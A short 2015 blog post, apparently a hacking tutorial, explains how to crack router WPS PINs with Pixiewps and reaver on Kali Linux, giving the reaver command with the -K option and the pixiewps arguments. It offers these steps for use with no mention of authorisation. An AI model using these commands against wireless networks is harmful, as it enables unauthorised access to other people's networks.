ad1

Saturday, August 22, 2015

Pixiewps ( Speed up WPS Attack ) Kali Linux



                   Pixiewps is utility to speed up WPS attack. Its a offline WPS attack tool and comes preinstalled with Kali Linux latest version . It is vulnerable to Ralink and some Broadcom chipset routers . But its always good to give a try . The reaver takes around 4 to 6 hours , but with this utility you can crack wps in just some seconds

In kali give command= reaver -i (interface) -b (bssid) -vv -K 1


             But if you want to use pixiewps seperately simply first run reaver without -K and when you get following data just copy past it 
                          Usage: pixiewps -e -r -s -z -a 

 Required Arguments:

    -e, --pke      : Enrollee public key
    -r, --pkr      : Registrar public key
    -s, --e-hash1  : E-Hash1
    -z, --e-hash2  : E-Hash2
    -a, --authkey  : Key used in HMAC SHA-256


                All you will get from reaver...see Below .. but make sure you have latest reaver 



Feel   Free   2   ask   any  question



No comments:

Post a Comment